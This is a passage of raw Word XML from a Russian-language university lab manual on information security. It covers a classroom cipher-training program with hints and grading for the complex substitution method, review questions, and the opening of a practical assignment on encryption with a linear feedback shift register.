        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>При выборе пункта «</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Редактировать</w:t>
      </w:r>
      <w:r>
        <w:t>» появляется список символов замены, которые еще не использованы в таблицы шифрования. После выбора символа в списке, он появляется в таблице, замещая выбранный символ. При этом замещенный символ появляется в списке неиспользуемых символов. Для добавления символа замены необходимо выбрать последний (пустой) столбец таблицы шифрования и вставить туда необходимый символ. При этом появится еще один пустой столбец на случай вставки еще одного символа замены для данного символа.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>При выборе пункта «</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Удалить</w:t>
      </w:r>
      <w:r>
        <w:t>» происходит удаление выбранного символа замены для данного символа. Этот пункт работает только в случае, если данный символ имеет более одного символа замены, в противном случае он недоступен.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Последний пункт меню - «</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Символ отмечен</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">». Он предназначен для графической отметки символа в таблице. Если пункт отмечен, то ячейка в таблице подсвечивается розовым цветом, если же пункт не отмечен, то ячейка имеет, как и все остальные ячейки, белый цвет. Отметка символа в таблице не несет какой-либо функциональной нагрузки, а предназначена лишь для удобства работы пользователя. Например, таким образом </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>студент может отмечать символы замены, в которых он уверен, и оставлять неотмеченными символы, которые находятся в таблице по умолчанию. Установить или убрать отметку на ячейке можно двойным щелчком мыши на этой ячейке.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>В списке выбора подсказки находятся три возможные подсказки: «ВЫДАТЬ ОТКРЫТЫЙ И ЗАКРЫТЫЙ ТЕКСТ», «ОТКРЫТЬ СИМВОЛ» и «ЗАШИФРОВАТЬ ТЕКСТ». Также в области списка выбора подсказки находится информация об общем количестве баллов, набранных за подсказки. За использование каждой подсказки начисляется определенное количество баллов. Причем, если выбирается подсказка на основании нескольких символов, то баллы даются за каждый символ подсказки.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>При выборе подсказки «ВЫДАТЬ ОТКРЫТЫЙ И ЗАКРЫТЫЙ ТЕКСТ» в области подсказки появляется кнопка «Вывести результат» для вывода открытого и соответствующего ему зашифрованного текста. Эта подсказка может соответствовать ситуации, при которой дешифровальщик располагает частью зашифрованного сообщения и соответствующему ей открытому тексту. При нажатии на кнопку результат помощи выводится в область результатов.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF00FF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Для шифрования текста используется искомая (скрытая) таблица шифрования. Так как у каждого символа из исходного алфавита имеется 1 и более символов замены, то эта подсказка позволяет определить лишь по одному символу замены на каждый символ открытого текста. За каждый открытый символ начисляется 1 балл. Открытый текст выдается произвольной длины в пределах от 10 до 20 символов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>При попытке ввести в поле ввода текста строку, содержащую более 20-ти символов, появится сообщение о невозможности ввода и последний введенный символ не будет помещен в поле исходного текста:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Если в поле ввода исходного текста не ввести ни одного символа и нажать при этом кнопку «Зашифровать текст», то появится сообщение о необходимости ввода текста.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Область подсказки используется для вывода информации обо всех трех подсказках в зависимости от выбранной. Также в этой области содержится информация о баллах, набранных за каждую подсказку отдельно.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Задание считается выполненным, если исходный текст полностью расшифрован. Это происходит при нажатии на кнопку «Дешифровать», при этом происходит дешифрование текста и выдается сообщение об окончании выполнения задания. Это сообщение содержит набранные за подсказки баллы и оценку за выполнение задания, рассчитанную на основании этих баллов:</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pPr>
      <w:r>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r>
        <w:t>Дайте определение «объекта» и «субъекта».</w:t>
      </w:r>
      <w:r w:rsidRPr="005067E3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(самостоятельная работа)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r>
        <w:t>Что представляет собой комплекс защиты информации?</w:t>
      </w:r>
      <w:r w:rsidRPr="005067E3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(самостоятельная работа)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r>
        <w:t>Что такое электронная цифровая подпись?</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pacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r>
        <w:t>Что включает в себя администрирование?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r>
        <w:t>Что такое шифр?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00502B74">
        <w:t xml:space="preserve">3.           Опишите </w:t>
      </w:r>
      <w:r>
        <w:t>метод ш</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>ифрования</w:t>
      </w:r>
      <w:r w:rsidRPr="00502B74">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> информации методом сложной подстановки</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">4.           </w:t>
      </w:r>
      <w:r w:rsidRPr="00502B74">
        <w:t xml:space="preserve">Опишите </w:t>
      </w:r>
      <w:r>
        <w:t>метод деш</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>ифрования</w:t>
      </w:r>
      <w:r w:rsidRPr="00502B74">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> информации методом сложной подстановки</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">5.           </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Дешифруйте исходный текст </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE6F84">
        <w:t>методом сложной подстановки</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00502B74" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00502B74" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Содержание отчета и его форма</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Выполнение задания с оценкой является заключительным действием обучаемого с системой.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Если студент набирает до 30 баллов, то получает оценку 5, от 31 до 60 баллов – 4, от 61 до 90 баллов - 3, более 90 баллов – оценку 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF00FF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Индивидуальные задания для тренировочного и контрольного тестирования выдаются системой автоматически по мере обращения за ними.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="113" w:name="l5"/>
      <w:bookmarkEnd w:id="113"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Практическая работа №5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Шифрование информации методом «Линейного регистра</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>с обратными связями»</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="bodytext2"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Цель работы: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>изучение порядка зашифрования и расшифрования информации методом «Линейного регистра с обратными связями».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Теоретическое обоснование</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Данная работа предназначена для проведения практического занятия по шифрованию информации методом “Линейного Сдвигового Регистра с обратными связями”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Шифрование.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Данный метод шифрования заключается в следующем:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Регистр с обратными связями используется как Генератор Псевдослучайных Кодов (ГПК). Выходная последовательность бит с ГПК </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>XOR</w:t>
      </w:r>
      <w:r>
        <w:t>-ится с информацией, которую необходимо зашифровать/расшифровать.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Ввод ключа (заполнение регистра ключевой информацией) заключается в следующем:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                     </w:t>
      </w:r>
      <w:r>
        <w:t>выбирается разрядность регистра;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                     </w:t>
      </w:r>
      <w:r>
        <w:t>задаются обратные связи;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                     </w:t>
      </w:r>
      <w:r>
        <w:t>начальное состояние регистра все '1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                     </w:t>
      </w:r>
      <w:r>
        <w:t>последовательно вводить ключевая информация.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Зашифрование выполняется следующим образом:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                     </w:t>
      </w:r>
      <w:r>
        <w:t>вычисляется новое состояние регистра;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                     </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">старший бит регистра </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>XOR</w:t>
      </w:r>
      <w:r>
        <w:t>-ится с соответствующим битом в исходной строки (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Binar</w:t>
      </w:r>
      <w:r>
        <w:t>) и заносится в конечную строку (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Binar</w:t>
      </w:r>
      <w:r>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                     </w:t>
      </w:r>
      <w:r>
        <w:t>предыдущий шаг повторяется до тех пор пока не будет зашифрована вся информация.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Расшифрование выполняется следующим образом:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                     </w:t>
      </w:r>
      <w:r>
        <w:t>вычисляется новое состояние регистра;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                     </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">старший бит регистра </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>XOR</w:t>
      </w:r>
      <w:r>
        <w:t>-ится с соответствующим битом в исходной строки (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Binar</w:t>
      </w:r>
      <w:r>
        <w:t>) и заносится в конечную строку (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Binar</w:t>
      </w:r>
      <w:r>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                     </w:t>
      </w:r>
      <w:r>
        <w:t>предыдущий шаг повторяется до тех пор пока не будет расшифрована вся информация.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Методика и порядок выполнения работы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Выбран режим «Без оценки» и нажата кнопка “Старт”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
